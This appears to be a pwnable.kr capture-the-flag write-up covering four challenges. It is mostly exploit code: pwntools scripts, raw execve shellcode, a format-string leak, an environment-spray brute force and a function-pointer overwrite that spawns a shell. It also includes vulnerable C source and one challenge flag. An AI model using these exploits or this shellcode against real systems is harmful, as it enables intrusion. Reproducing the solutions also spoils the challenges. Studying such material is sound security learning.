pwnable-kr-6

1.echo2

solve

from pwn import *

p = remote('pwnable.kr', 9011)
shellcode="\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"
p.recvuntil('name? :')
p.sendline(shellcode)
p.recvuntil(">")
p.sendline('2')
p.sendline("%9$p")
p.recvline()
addr = int(p.recvline(), 16) - 0x20
log.info('addr:'+hex(addr))
p.sendline('4')
p.sendline('n')
p.sendline('3')
p.sendline('A' * 24 + p64(addr))
p.interactive()

flag

fun_with_UAF_and_FSB :)

2.alloca

question

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void callme(){
    system("/bin/sh");
}

void clear_newlines(){
    int c;
    do{
        c = getchar();
    }while (c != '\n' && c != EOF);
}

int g_canary;
int check_canary(int canary){
    int result = canary ^ g_canary;
    int canary_after = canary;
    int canary_before = g_canary;
    printf("canary before using buffer : %d\n", canary_before);
    printf("canary after using buffer : %d\n\n", canary_after);
    if(result != 0){
        printf("what the ....??? how did you messed this buffer????\n");
    }
    else{
        printf("I told you so. its trivially easy to prevent BOF :)\n");
        printf("therefore as you can see, it is easy to make secure software\n");
    }
    return result;
}

int size;
char* buffer;
int main(){

    printf("- BOF(buffer overflow) is very easy to prevent. here is how to.\n\n");
    sleep(1);
    printf("   1. allocate the buffer size only as you need it\n");
    printf("   2. know your buffer size and limit the input length\n\n");

    printf("- simple right?. let me show you.\n\n");
    sleep(1);

    printf("- whats the maximum length of your buffer?(byte) : ");
    scanf("%d", &size);
    clear_newlines();

    printf("- give me your random canary number to prove there is no BOF : ");
    scanf("%d", &g_canary);
    clear_newlines();

    printf("- ok lets allocate a buffer of length %d\n\n", size);
    sleep(1);

    buffer = alloca( size + 4 );    // 4 is for canary

    printf("- now, lets put canary at the end of the buffer and get your data\n");
    printf("- don't worry! fgets() securely limits your input after %d bytes :)\n", size);
    printf("- if canary is not changed, we can prove there is no BOF :)\n");
    printf("$ ");

    memcpy(buffer+size, &g_canary, 4);  // canary will detect overflow.
    fgets(buffer, size, stdin);     // there is no way you can exploit this.

    printf("\n");
    printf("- now lets check canary to see if there was overflow\n\n");

    check_canary( *((int*)(buffer+size)) );
    return 0;
}

solve

https://gist.github.com/tsarpaul/d6a10c3f271ce58d20633a872aec96b9

from pwn import *
# overwrite $ebp-0x4 with ret.
# bruteforce the program so ret will contain env, which is sprayed with pointers to shell function
ret = "-4759552"
spray = p32(0x80485ab)*30000
env = {str(a):spray for a in range(12)}

while True:  # Took me about 12 tries
  p = process('~/Downloads/alloca', env=env)
  p.sendline('-68')
  p.sendline(ret)
  p.interactive()

3.rsa_calculator

solve 1

overflow func

#!/usr/bin/env python
# -*- coding: utf-8 -*-

'''
learn from Gros
'''

from pwn import *
from binascii import *
from gmpy2 import next_prime, iroot,invert



BINARY_FILE = './rsa_calculator'
REMOTE = ('pwnable.kr', 9012)


def setup_connection():
    binary, libc, preload = None, None, False
    local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
    task_libc = './libc.so.6'

    env = {}
    if args.PRELOAD:
        local_libc = task_libc
        env = {'LD_PRELOAD': task_libc}

    if args.BINARY:
        binary = ELF(BINARY_FILE)
        context.arch = binary.arch

    if args.DBG:
        context.log_level='debug' 

    if args.REMOTE:
        if args.LIBC:
            libc = ELF(task_libc)
        s = remote(*REMOTE)
    else:
        if args.LIBC:
            libc = ELF(local_libc)
        
        s = process(BINARY_FILE, stderr=open('/dev/null', 'w+'), env=env)
        if args.GDB:
            context.log_level='debug'
            context.terminal = ['gnome-terminal', '-e']
            breakpoints = [0x401408, 0x400e97]  # ret from rsa_encrypt
            gdb.attach(s, exe=BINARY_FILE,gdbscript='\n'.join(['b *'+str(x) for x in breakpoints]))
            
    return s, binary, libc

if __name__ == '__main__':
    s, binary, libc = setup_connection()

    context.update(arch = 'amd64')

    g_pbuf = 0x602560
    shellcode_addr = g_pbuf + len('/bin/sh\x00')
    system_global = 0x602538 
    addr_plaintext=105
    p=4099
    q=4111
    e=405641
    phi=(p-1)*(q-1)
    d=invert(e,phi)
    d=0xffffffff
    # set keys
    log.info("Set keys")
    s.recvuntil('>')
    s.sendline('1')
    s.recvuntil('p :')
    s.sendline(str(p))
    s.recvuntil('q :')
    s.sendline(str(q))
    s.recvuntil('set public key exponent e :')
    s.sendline(str(e))
    s.recvuntil('set private key exponent d :')
    s.sendline(str(d))
    s.recvuntil('>')

    shellcode = '/bin/sh\x00'
    shellcode += asm('''mov rdi, {g_pbuf}
                        xor rsi, rsi
                        xor rdx, rdx
                        mov rax, [{system_global}]
                        call rax
                        mov rax, {exit}
                        jmp rax
                        '''
                    .format(g_pbuf=g_pbuf, system_global=system_global, exit=0x400CBA)
                    )
    # encrypt
    # encrypted payload goes to: 0x6020e0 <g_ebuf>
    # shellcode goes to: 0x602560 <g_pbuf>
    log.info("Overwrite func array")
    payload = shellcode
    payload = payload.ljust(256 + 1 + 7, 'A')
    payload += p32(addr_plaintext)

    s.sendline('2')
    s.recvuntil('how long is your data?(max=1024) :')
    s.sendline(str(len(payload)))
    s.recvuntil('paste your plain text data')
    s.sendline(payload)
    s.recvuntil('>')

    log.success('done')

    s.sendline('1')
    s.interactive()
    s.close()

4.fix

solve

ulimit -s unlimited
./fix
15
92s